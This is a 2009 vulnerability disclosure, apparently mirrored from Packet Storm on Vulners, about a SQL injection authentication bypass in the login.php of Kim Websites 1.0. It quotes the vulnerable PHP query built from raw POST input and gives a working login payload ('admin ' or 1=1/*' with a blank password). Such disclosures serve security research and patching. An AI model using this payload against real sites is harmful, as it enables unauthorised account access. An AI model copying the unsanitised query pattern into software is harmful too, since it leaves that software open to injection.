Lucene search
K

Kim Websites 1.0 SQL Injection

🗓️ 13 Mar 2009 00:00:00Reported by hadihadiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Kim Websites 1.0 SQL Injection Vulnerability in login.ph

Code
`   
###############################################################  
# #  
# Kim Websites 1.0 SQL Injection Vulnerability #  
# [ Authentication bypass] #  
###############################################################  
Virangar Security Team  
www.virangar.net  
--------  
Discoverd By : Virangar Security Team(hadihadi)  
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra  
& all virangar members & Aria_security team & all hackerz  
greetz:to my best friend in the world hadi_aryaie2004  
& my lovely friend arash(imm02tal)  
-----------------------------------  
vuln code in login.php:  
$username = $_POST['username'];  
$password = md5($_POST['password']);  
$query= "SELECT name,password FROM ".$prefix."_users WHERE name = '$username' AND password = '$password' AND confirm = 1 AND date2 > FROM_UNIXTIME($now)";  
-----------------------  
Exploit:  
login:admin ' or 1=1/*  
password:[blank]  
-------------------------------------  
Y0ung Ir4ni4n H4ck3rz  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation